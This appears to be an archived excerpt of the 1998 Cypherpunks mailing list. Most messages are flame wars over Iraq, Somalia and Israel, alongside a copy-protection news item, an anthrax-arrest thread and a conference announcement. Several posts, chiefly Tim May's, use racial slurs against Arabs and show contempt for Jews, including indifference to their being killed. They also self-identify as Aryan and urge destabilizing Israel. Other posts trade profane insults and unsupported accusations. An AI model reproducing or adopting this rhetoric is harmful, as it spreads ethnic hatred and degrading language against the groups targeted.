this kind of censorship. Better to just let the Arabs fight the Jews,
without any funding from U.S. slave-taxpayer-units. If the Arabs kill all
the Jews I'll say it was a really, really stupid ideas for a bunch of Jews
from Poland and Germany and Russia to go kick out a bunch of "sand niggers"
and "ragheads" and not expect retribution to someday arrive.

Oh, and spare me the typical Zionist rhetoric about how "YHWH" or Whatever
It's Damned Name Is "promised" this land to the Jews, despite their Polish
or Russian or Ukrainian residency and genetics for thousands of years.

Fucking religious fruitcakes.


--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel J. Boone" <dboone@ptialaska.net>
Date: Fri, 20 Feb 1998 13:21:53 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <199802200515.UAA00982@ptialaska.net>
MIME-Version: 1.0
Content-Type: text/plain




Barry Wainwright wrote:
> 
> At 4:51 pm -0500 on 10/2/98, sombody pretending to be Brian B. Riley wrote:
> 
> > Alabama licenses have the holder's SSN on them (because that way
> >the state gets more Federal highway $), except his parents had never
> >applied to get him one, because of their religion.
> 
> What religion precludes the holding of a SS no.?

Here's one: Western Sect Freedonianism.  Check out 

http://www.geocities.com/SoHo/Lofts/2110/F_Freedonian.html

<g>

-- J.Q. Lurker





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 20 Feb 1998 10:27:20 +0800
To: cypherpunks@www.video-collage.com
Subject: Digital copy prot3ction
Message-ID: <199802200216.UAA09021@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text




I can hardly believe that any of these schemes are undefeatable.

As soon as the CPU starts talking to a video and sound board, 
this whole thing becomes easily breakable. All one needs to do is
to capture the signals that go to these boards and re-record them.

Right?

======================================================================
Thursday February 19, 3:58 am Eastern Time

Firms said to agree on digital anti-piracy system

LOS ANGELES, Feb 19 (Reuters) - Five giants of the computer and
electronics industries have agreed on technology designed to protect
Hollywood's most valuable products from being illegally copied, a
newspaper reported on Thursday.

The Los Angeles Times said Sony Corp (NYSE:SNE - news; 6758.T), Intel
Corp(INTC - news), Matsushita Electric Industrial Co (MSES.KL), Toshiba
Corp (6502.T) and Hitachi Ltd (NYSE:HIT - news; 6501.T) were expected
to announce later on Thursday a proposal to deploy encryption technology
that will prevent people from making illicit copies of copyright digital
content.

The deal could be a breakthrough for the entertainment industry, which
has been wary of the ease with which digitally distributed material can be
endlessly copied without any degradation in quality, the newspaper said.

``If somebody tries to violate a copyright, it won't work,'' the
newspaper quoted Mike Aymar, vice president of consumer products at Intel,
as saying.

``The goal is that you'll see products on the marketplace that support
this by the end of the year,'' Aymar said.

The proposed technology would have no effect on televisions, video
cassette recorders or computers already in use, the paper said.

It said the agreement was presented on Wednesday in Burbank, California,
to the Copy Protection Technical Working Group, a committee that is
led by major movie studios and includes representatives of the music,
computer, software and electronics industries.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 20 Feb 1998 10:37:58 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Digital copy prot3ction (fwd)
Message-ID: <199802200241.UAA20917@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Digital copy prot3ction
> Date: Thu, 19 Feb 1998 20:16:49 -0600 (CST)
> From: ichudov@algebra.com (Igor Chudov @ home)

> I can hardly believe that any of these schemes are undefeatable.
> 
> As soon as the CPU starts talking to a video and sound board, 
> this whole thing becomes easily breakable. All one needs to do is
> to capture the signals that go to these boards and re-record them.
> 
> Right?

> The proposed technology would have no effect on televisions, video
> cassette recorders or computers already in use, the paper said.

I suspect that this part is the key, what they will propose is some
mechanism to alter the chipsets from the one currently implimented. Expect
them to impliment something similar to the DAT tape systems where the machine
won't execute a copy function if it sees the correct signal.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Eric J. Tune" <paladin@lvcablemodem.com>
Date: Fri, 20 Feb 1998 13:02:39 +0800
To: cypherpunks@cyberpass.net
Subject: Re: PLO censoring pro-Iraqi sentiments
Message-ID: <3.0.5.32.19980219204255.007c3680@pop3.lvcablemodem.com>
MIME-Version: 1.0
Content-Type: text/plain



>Eric Tune writes:
>
>> You know Tim, I respect most of what you write, and I respect you in
>> that you have your own free will and opinions and the right to express
>> them, but what you have forgotten in your anarchistic ravings is that
>> PEOPLE DIED IN SOMALIA, including a personal friend of mine.  They were
>> all somebody's son, brother, and friend. 
>
>So were the 100,000 Iraqi military killed by Bush, and the 1,000,000
>Iraqis of all ages killed by US sanctions.  So were the civilians
>bulldozed into mass graves in Panama, so the country would look neat and
>tidy for the arrival of the ReportWhores.
>
>What the world needs now is not another mass killing of Iraqis by the
>United States government.  What the world really needs now is a fifty
>dollar weapon that sinks aircraft carriers.
>
>> These soldiers went where they were ordered to go, as befits a soldier,
>> and tried to do the job they were given and accomplish the mission, and
>> for that EVERY ONE OF THEM DESERVES Y O U R RESPECT.  I am quite sure
>> the vast majority of them thought it was patently stupid to go to
>> Somalia in the first place, but a soldier follows orders, legal ones,
>> and tries to get the job done regardless of personal feelings.
>
>Most of them would probably follow "legal orders" to fire upon American
>civilians too.  

You ever served in the military?  Unless you've been under fire, you should
shut the fuck up about shit you know nothing about nor could comprehend.

>> The next time you "cheer to see the U.S. gets its tail kicked", why
>> don't you think about the American troops who lost their lives or were
>> maimed, or who were doing something they may have been personally and
>> morally against, but they chose to be professional soldiers, and instead
>> of displaying cowardice, they tried to do what was asked of them. 
>
>The universe does not view the lives of Americans as more valuable than
>the lives of people murdered by Americans. 

Listen up jerk, in case you didn't get any news during 1990, Iraq attacked
Kuwait, and murdered thousands of Kuwaitis.  "Don't start no shit and there
won't be no shit"... ever heard that, asshole?  America would have never
been involved if Iraq hadn't invaded Kuwait.  I was there, in a Bradley,
and we could have rolled all over Baghdad, especially after what the Iraqi
bastards did to the Kuwaitis, but it wasn't done. Unfortunately Saddam
Hussein stayed in power.  There will not be a shred of a chance for peace
in that region until he is DEAD.  I don't think air strikes are the answer
to this, and I think Clinton is a moron for his present policy, War is the
worst thing that man can do to other men, and there is no such thing as
"the good fight"... war is hell. Period.  Until you have been in a war, you
have no idea of what you are talking about.  But if you think that Iraq was
"more right" or better yet, "less wrong", you need a radical lobotomy, or
perhaps you've already had one.

>> Think of the innocent civilians who inevitably die in the conflicts
>> started by the megalomaniacs like Saddam Hussein.
>
>You mean all those melted child car seats and scorched teddy bears on
>George Bush's "Highway of Death" leading out of Kuwait? 

Evidently, you again know nothing of what the Iraqis did to the Kuwaitis on
their way in to Kuwait.  Get educated, shithead. 

>Unfortunately, for all the braying Americans do about freedom, Americans
>can never be truly happy unless someone is telling them what to do, or
>they are telling someone else what to do, or they are bombing someone for
>not doing what they have told them to do. 
>
>The only thing Americans understand is dead Americans.  The only thing. 

You sound like nothing more than disillusioned, spoiled, pompous asshole
when you presume to know what Americans "understand".  Your anarchistic
ravings only mark you for the idiot you are.

To everyone else besides Cordian who reads this, my apologies, but for all
it's failings, I still have pride in America... ...not for all the foreign
policy bullshit or the way the government fucks us over, or starts wars, or
sticks their collective nose in other countries business...but for the fact
that as a whole people, Americans still keep trying, everyday, to be a
better people. I'm proud of that.

Eric Tune





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 14:20:21 +0800
To: cypherpunks@cyberpass.net
Subject: "My country, right or wrong"
In-Reply-To: <3.0.5.32.19980219140712.007bda40@pop3.lvcablemodem.com>
Message-ID: <v03102800b112cf7a76d2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:07 PM -0800 2/19/98, Eric J. Tune wrote:

>>
>[SHIT REMOVED]
>


I think this item, and your other frothings, show why you should not be
taken seriously.

Once again, a lurker who has never posted any substantive ideas delurks to
foam and spew insults.

In any case, all of the arguments I have seen from you boil down to that
tired old chestnut:

"My country, right or wrong."

A good attitude for cannon fodder to have.  Not such a good attitude for
free men to have.

Time to add you to my ever-growing killfile.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Fri, 20 Feb 1998 11:40:56 +0800
To: <cypherpunks@cyberpass.net>
Subject: Re: PLO censoring pro-Iraqi sentiments
Message-ID: <199802200322.WAA27685@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


>> The next time you "cheer to see the U.S. gets its tail kicked", why
>> don't you think about the American troops who lost their lives or
were
>> maimed, or who were doing something they may have been personally and
>> morally against, but they chose to be professional soldiers, and
instead
>> of displaying cowardice, they tried to do what was asked of them. 

 I prefer to view what Tim said in the context that "Amerika" the ugly
got its tail kicked in the broader sense. I don't believe that Tim took
any pleasure in seeing American soldiers getting killed.

  The fact remains that we, Amerika, did get our tail kicked in Somalia;
like Viet Nam it was little reflection on the troops but a reflection of
the of a command staff being run by Washington DC Apparatchiki all
suffering from cranio-rectal inversion. America deserves all the
ridicule that has been heaped upon it for those fiascos; only ... some
time, maybe we can but hope the we will finally learn at least one
lesson and get it right once before I go for the long sleep!
 

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNOz23D7r4fUXwraZAQFTmAf+NduMJzQp+B4bgILGKcE2n2nMiqqCbV3F
gfDqNCANv8I+9VFIZp5yXomg6fmrv/byz/KBAJ0Vb+r8Sgmw/EofflN6s5fInVTq
GZlg9aGkdQRHSo8dRuGsxeIkQE0tYqISqFWLNdf5raKEE1UygYoOxQ83snZFvFLU
VFOdo37zepo3qlfRNwt2TSW4Wg5D02uQHQIONah64/F9XIENoBAfTLhdeglAN05z
L+JGC0hUgyzjv+vmN4qBgtQJIKKOJO1eyQsT1csDXXWPoD/O7I+w6bwS98Yf4UA2
d8T+G8vBdms7rpjQkX7cpa2XASufl1A+3YI8vVDMUREBSjJRTH85nA==
=tsyh
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "Despite the bleating of various socialistically-anointed
 freakshow groups, the vast majority of us realize that bringing
 children into the world is not only the most wonderful endeavor
 with which we can be associated but absolutely essential if we
 aren't going to put ourselves on the EPA's endangered species
 list."  Winston Borden






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Fri, 20 Feb 1998 06:20:43 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Anthrax--The Horsemen are Riding
Message-ID: <199802192135.WAA17978@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Yet another wrong call by Tim "Chicken Little" May:

>CNN is reporting a news flash, with few details, about two men being
>arrested in Las Vegas for making or possessing or planning to make
>anthrax. Details should be emerging, but I have a hunch it's a witch
>hunt, an invocation of the Four Horsement, to drum up support for
>Clinton's Dirty Little War.

Nonsense.  This has nothing to do with Saddam.  These men are from the
Aryan Nation, a militia group (and one which Tim secretly supports, being
a strong believer in Aryan superiority).  No wonder he is upset, when
his favorite racists are shown to be just another bunch of terrorists,
willing to kill innocents to promote their hate-filled cause.

>"Find us some jimbells we can show to the American public as proof that
>an undeclared, unsupported war with Iraq is justified."

How incoherent can you get?  How on earth can terrorism by the militias
be related to the war in Iraq?  Jeez, what an idiot.

>Wanna bet they also bring crypto in this media circus?

This would be funny if it weren't so sad.  And you guys really _respect_
someone who would write this nonsense?

It's a sad story when the one who is supposed to be the brains of the
group is this stupid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 20 Feb 1998 15:21:39 +0800
To: "Attila T. Hun" <cypherpunks@cyberpass.net>
Subject: Re: onward, Clinton soldiers / not so fast, Sen. Lott
In-Reply-To: <19980220.000200.attila@hun.org>
Message-ID: <3.0.5.32.19980219223651.007da660@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Iran's popular, elected leader, Mohammed Mossadegh, attempts to
>assert Iranian control of his nation's oil industry, whose
>profits go to the US and Britain.  A CIA coup overthrows
>Mossadegh, and puts `our boy' Reza Shah on the throne.  Iran's
>US-trained secret police keep the Shah in power through a reign
>of terror.  Islamic-nationalist revolution sweeps Iran in 1979,
>ending US domination.

A minor correction - while the CIA wanted to overthrow Mossadegh,
they screwed up, and had very little part in actually doing it.
The British were the main instigators of the coup, which had a 
fair amount of popular support, and which went fast enough that the
CIA was caught by surprise - they hadn't even spent a tenth of their
bribery slush fund yet.  

So why does everybody keep saying that the CIA put the Shah in power?
Because in the early 60s, trying to repair their reputation after the
Bay Of Pigs fiasco, the CIA put out a lot of PR taking credit for it,
and since it was the kind of thing they would have done if they 
hadn't missed the starting gun, people pretty much believed them.
And a lot of Iranians have been blaming them for it ever since.

[References:  Some book I read a while back.  Don't remember the
title or the author, but the author was Iranian, so he may have
had his own axe to grind; certainly the CIA had their cloak and dagger
to grind in this whole mess.]

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 14:59:09 +0800
To: cypherpunks@cyberpass.net
Subject: The Eloquence of Eric J. Tune
In-Reply-To: <3.0.5.32.19980219204255.007c3680@pop3.lvcablemodem.com>
Message-ID: <v03102801b112d837746d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:42 PM -0800 2/19/98, Eric J. Tune wrote:

>You ever served in the military?  Unless you've been under fire, you should
>shut the fuck up about shit you know nothing about nor could comprehend.
...
>Listen up jerk.... "Don't start no shit and there
>won't be no shit"... ever heard that, asshole?
...
>Get educated, shithead.
...
>You sound like nothing more than disillusioned, spoiled, pompous asshole


Such eloquence! He must've learned it in the military.

Very persuasive, too. Persuasive to a certain kind of person.

Wasted on this list, though.


--Tim May


Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 20 Feb 1998 15:23:05 +0800
To: Eric Cordian <cypherpunks@cyberpass.net
Subject: Re: Anthrax--The Horsemen are Riding
In-Reply-To: <199802192135.WAA17978@basement.replay.com>
Message-ID: <3.0.5.32.19980219231708.007da950@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> Nonsense.  This has nothing to do with Saddam.  These men are from the
>> Aryan Nation, a militia group (and one which Tim secretly supports, being
...
>This has everything to do with Sadaam.  These individuals came to the
>attention of the government a long time ago, have been under surveilance,
>and their carefully timed arrest today, at the precise moment needed to
>give the Sheeple an overdose of Biological Warfare sound bytes, is hardly

The Wag The Dog war has almost nothing to do with Saddam, but I agree
that the Anthrax Nation supporters are being brought out specifically
to scare the population.  One of the comments on the radio was that
the perp was bragging about having military-grade anthrax.
They didn't say whose military was in the anthrax-grading business,
but it's probably those evil manufacturers of weapons of Mass destruction --
The Pentagon.  

<expletive deleted>.  Are we going to have to levitate the Pentagon again?
Is there some way to just do it over the net?  :-)


And yes, even through Freeh hasn't been quoted about the need for
wiretaps in the radio stories I've heard so far, I'm sure he will be.

> Of course, it could also just be monumental stupidity on his timing (to
> confirm the FBI's "dumb criminal" model).
Nah - he's a perpetual "usual suspect" type.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 20 Feb 1998 12:46:24 +0800
To: cypherpunks@cyberpass.net
Subject: IFCA
Message-ID: <v04003a00b112b5290a94@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Thu, 19 Feb 1998 21:52:04 -0400
X-Authentication-Warning: online.offshore.com.ai: list set sender to
fc98-request@offshore.com.ai using -f
Date: Fri, 20 Feb 1998 02:33:04 +0100 (MET)
From: Ray Hirschfeld <R.Hirschfeld@cwi.nl>
To: fc98@offshore.com.ai
Subject: IFCA
Resent-From: fc98@offshore.com.ai
X-Mailing-List: <fc98@offshore.com.ai> archive/latest
X-Loop: fc98@offshore.com.ai
Precedence: list
Resent-Sender: fc98-request@offshore.com.ai

The second year of a new conference is perhaps the most difficult--the
novelty has worn off but the conference is not yet firmly established.
But all indications for FC98 are promising.  Another success next week
will be a signal to do it again next year.

A new organization, the International Financial Cryptography
Association (IFCA) has been formed to support future meetings of the
Financial Cryptography conference.  IFCA will not only be responsible
for organizational aspects of the conference, but will also select the
program chair.  All paid registrations of FC98 will automatically
receive a year's membership in IFCA (unless they indicate that they do
not wish to join).  Others may join by paying membership dues.  A
first general meeting of IFCA will be held on the evening of Tuesday
February 24, just before the conference rump session, and all members
are encouraged to attend.

The main purposes of the meeting will be to elect directors and to
discuss possible locations for FC99 (and perhaps FC00).  If you are
interested in hosting an FC conference and can provide some logistic
support for it, you are invited to bring a proposal to the meeting.
Ideas tossed around so far have mostly focused on other "financial
island" locations, e.g., Grand Cayman, Hong Kong, Manhattan, Jersey,
etc., but anyplace reasonable will be considered.  (There will almost
certainly be insufficient information available at the time of the
meeting to make a decision, but an indication of the wishes of the
membership will be gathered to help guide the directors.)

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 15:31:14 +0800
To: cypherpunks@cyberpass.net
Subject: Letting Israel Twist Slowly in the Desert Wind
In-Reply-To: <v0310280eb112ae1ab77c@[207.167.93.63]>
Message-ID: <v03102802b112da19e5bd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:48 PM -0800 2/19/98, William H. Geiger III wrote:

>I find it quite intresting how members will bemone the plight of the
>Plaistinians in Israel yet no one ever mentions the fact that 80% of the
>population of Jordan is Palistinian. Nor do they mention the reasons *why*

So? The land taken from a Palestinian farmer and given to a Polish Jew, for
example, remains his, morally. That a neighboring country has many persons
similar to him does not reduce his loss.

80% of Oregon is Aryan, just as I am. And yet if a bunch of Jews, for
example, kicked me off my land, land I had title to, and I fled to Oregon
to live in a tent, I'd still be fighting those who kicked me off my land.
Even if the Jewish Grand Foofah declared that God had "given" California to
the Jews 3000 years ago.

Oregon is under no obligation to absorb the Aryans kicked out of California
by the Jews. And the farm or land lost is still lost, regardless of any
"absorbtion." The canard about how Jordan is racially similar to the
Palestinians is neither here nor there...the Palestinian farmer who used to
grow oranges in Jaffa is hardly satisfied to learn that his land has been
stolen by a Polish Jew, but that neighboring Jordan has a lot of
Palestinians!

(BTW, I use the word Aryan in place of the word Caucasian, which is no
longer in scientific use, and was a dumb characterization of Aryans,
anyway. )

>the PLO was operating out of Lebanon in the 70's and early 80's (for those
>of you who don't know it's because they tried to overthrow the government
>in Jordan and the King sent the troops out to slaughter them.) Nor is
>there any mention that historically there was never any county of
>Palistine until the British created it out of what was known as

Who cares if their was a nation-state or not? Just give them back their
land. Period. Nation-states are a modern creation anyway.

>Trans-Jordan which again was a creation of the British after the defete of
>the Ottoman Empire (the Turks for the less informed) durring WWI. Lets not
>forget that the British promised both the Jews and the Palistinians their
>own country (unfortunatly they promised them both the same peice of land).
>And god forbid no one ever mentions the fact that the UN created both a
>State of Israel and a State of Palistine in 1945 and the Palistinians
>rather than declare thier independence and form a governemnt joined with
>the rest of the Arab states in going to war against the Jews currently
>living in Palistine. They then were promptly handed their asses by the
>Israelies *without* help from the British or the US (as an intresting side
>note it was the Russians who were the first to reconise the State of
>Israel not any of the western governments).

I agree it's a mess. So why is the U.S. sending $5 billion a year extorted
from American slave-units to subsidize Israel's military and lifestyle, and
about as much to Egypt to subsidize whatever corruptions it favors?

I say pull out, stop the funding, and let American Jews send their money if
they want to. Let the Arabs and Jews fight it out. Just don't require me to
pay for it or to pay for soldiers to be sent to defend one side or the
other.

And use crypto and suchlike to destabilize the Zionist regime in various ways.


>Now some may wish to extend the lame argument that the British didn't have
>the right to carve up the middle east nor did the Jews have the right to
>immegrate to Israel. Well the simple fact of the matter is that *every*
>country in exsistance today has been created by one group of people
>conquering another. All the countries of North *and* South America were
>formed that way. The empires of the Incas and Aztecs were formed the same
>way. The various tribes of North America gaind control of their "huntting
>grounds" by taking them away from those that were there before.

Whatever the history lesson, all I ask is that slave labor (taxes) not be
used over there, nor that cannon fodder be sent over there to die.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 20 Feb 1998 13:49:39 +0800
To: "Eric J. Tune" <paladin@lvcablemodem.com>
Subject: Re: PLO censoring pro-Iraqi sentiments
In-Reply-To: <3.0.5.32.19980219204255.007c3680@pop3.lvcablemodem.com>
Message-ID: <199802200612.BAA31481@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.5.32.19980219204255.007c3680@pop3.lvcablemodem.com>, on 02/19/98 
   at 08:42 PM, "Eric J. Tune" <paladin@lvcablemodem.com> said:


>>Eric Tune writes:
>>
>>> You know Tim, I respect most of what you write, and I respect you in
>>> that you have your own free will and opinions and the right to express
>>> them, but what you have forgotten in your anarchistic ravings is that
>>> PEOPLE DIED IN SOMALIA, including a personal friend of mine.  They were
>>> all somebody's son, brother, and friend. 
>>
>>So were the 100,000 Iraqi military killed by Bush, and the 1,000,000
>>Iraqis of all ages killed by US sanctions.  So were the civilians
>>bulldozed into mass graves in Panama, so the country would look neat and
>>tidy for the arrival of the ReportWhores.
>>
>>What the world needs now is not another mass killing of Iraqis by the
>>United States government.  What the world really needs now is a fifty
>>dollar weapon that sinks aircraft carriers.
>>
>>> These soldiers went where they were ordered to go, as befits a soldier,
>>> and tried to do the job they were given and accomplish the mission, and
>>> for that EVERY ONE OF THEM DESERVES Y O U R RESPECT.  I am quite sure
>>> the vast majority of them thought it was patently stupid to go to
>>> Somalia in the first place, but a soldier follows orders, legal ones,
>>> and tries to get the job done regardless of personal feelings.
>>
>>Most of them would probably follow "legal orders" to fire upon American
>>civilians too.  

>You ever served in the military?  Unless you've been under fire, you
>should shut the fuck up about shit you know nothing about nor could
>comprehend.

>>> The next time you "cheer to see the U.S. gets its tail kicked", why
>>> don't you think about the American troops who lost their lives or were
>>> maimed, or who were doing something they may have been personally and
>>> morally against, but they chose to be professional soldiers, and instead
>>> of displaying cowardice, they tried to do what was asked of them. 
>>
>>The universe does not view the lives of Americans as more valuable than
>>the lives of people murdered by Americans. 

>Listen up jerk, in case you didn't get any news during 1990, Iraq
>attacked Kuwait, and murdered thousands of Kuwaitis.  "Don't start no
>shit and there won't be no shit"... ever heard that, asshole?  America
>would have never been involved if Iraq hadn't invaded Kuwait.  I was
>there, in a Bradley, and we could have rolled all over Baghdad,
>especially after what the Iraqi bastards did to the Kuwaitis, but it
>wasn't done. Unfortunately Saddam Hussein stayed in power.  There will
>not be a shred of a chance for peace in that region until he is DEAD.  I
>don't think air strikes are the answer to this, and I think Clinton is a
>moron for his present policy, War is the worst thing that man can do to
>other men, and there is no such thing as "the good fight"... war is hell.
>Period.  Until you have been in a war, you have no idea of what you are
>talking about.  But if you think that Iraq was "more right" or better
>yet, "less wrong", you need a radical lobotomy, or perhaps you've already
>had one.

>>> Think of the innocent civilians who inevitably die in the conflicts
>>> started by the megalomaniacs like Saddam Hussein.
>>
>>You mean all those melted child car seats and scorched teddy bears on
>>George Bush's "Highway of Death" leading out of Kuwait? 

>Evidently, you again know nothing of what the Iraqis did to the Kuwaitis
>on their way in to Kuwait.  Get educated, shithead. 

>>Unfortunately, for all the braying Americans do about freedom, Americans
>>can never be truly happy unless someone is telling them what to do, or
>>they are telling someone else what to do, or they are bombing someone for
>>not doing what they have told them to do. 
>>
>>The only thing Americans understand is dead Americans.  The only thing. 

>You sound like nothing more than disillusioned, spoiled, pompous asshole
>when you presume to know what Americans "understand".  Your anarchistic
>ravings only mark you for the idiot you are.

>To everyone else besides Cordian who reads this, my apologies, but for
>all it's failings, I still have pride in America... ...not for all the
>foreign policy bullshit or the way the government fucks us over, or
>starts wars, or sticks their collective nose in other countries
>business...but for the fact that as a whole people, Americans still keep
>trying, everyday, to be a better people. I'm proud of that.

Wow! I haven't seen this kind of reactionary temper-tantrum since the last
4th of July BBQ down at the VFW.

So how long were you in?? Usally this type of "God save the King"
mentality wears off after a boot has been in the field for a few months.
For the more febal minded it lasts longer but they usally never make it
above Cpl. or 1st Lt.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: Bugs come in through open Windows.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO0JkI9Co1n+aLhhAQGeAQP/Z3zTLezopxF3l7vb6tRDuT3YDFTucr1d
h3JQ5ieWdFAPdNQmvlvnXNU2L7JoQW5J34b3gYnA9M3+xNK8DRBcifpojLkQItPj
zoZfta2A2giGgNsRpdmPrrrQUtMWhhN4SzOllwsidayCQiLxVX3eaQCOzEIIRpSy
aWD6KU0wyGY=
=aTfM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 20 Feb 1998 14:42:12 +0800
To: Tim May <tcmay@got.net>
Subject: Re: PLO censoring pro-Iraqi sentiments
In-Reply-To: <v0310280eb112ae1ab77c@[207.167.93.63]>
Message-ID: <199802200656.BAA31853@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v0310280eb112ae1ab77c@[207.167.93.63]>, on 02/19/98 
   at 08:04 PM, Tim May <tcmay@got.net> said:

>And as for the thread name here, "PLO censoring pro-Iraqi sentiments,
>it's reprehensible that the U.S. is pushing a "peace process" which
>condones this kind of censorship. Better to just let the Arabs fight the
>Jews, without any funding from U.S. slave-taxpayer-units. If the Arabs
>kill all the Jews I'll say it was a really, really stupid ideas for a
>bunch of Jews from Poland and Germany and Russia to go kick out a bunch
>of "sand niggers" and "ragheads" and not expect retribution to someday
>arrive.

>Oh, and spare me the typical Zionist rhetoric about how "YHWH" or
>Whatever It's Damned Name Is "promised" this land to the Jews, despite
>their Polish or Russian or Ukrainian residency and genetics for thousands
>of years.

Well the polotics of the middle east and the history of the Jews both in
and out of Israel are much more convoluted that Tim and other would make
it out to be.

I find it quite intresting how members will bemone the plight of the
Plaistinians in Israel yet no one ever mentions the fact that 80% of the
population of Jordan is Palistinian. Nor do they mention the reasons *why*
the PLO was operating out of Lebanon in the 70's and early 80's (for those
of you who don't know it's because they tried to overthrow the government
in Jordan and the King sent the troops out to slaughter them.) Nor is
there any mention that historically there was never any county of
Palistine until the British created it out of what was known as
Trans-Jordan which again was a creation of the British after the defete of
the Ottoman Empire (the Turks for the less informed) durring WWI. Lets not
forget that the British promised both the Jews and the Palistinians their
own country (unfortunatly they promised them both the same peice of land).
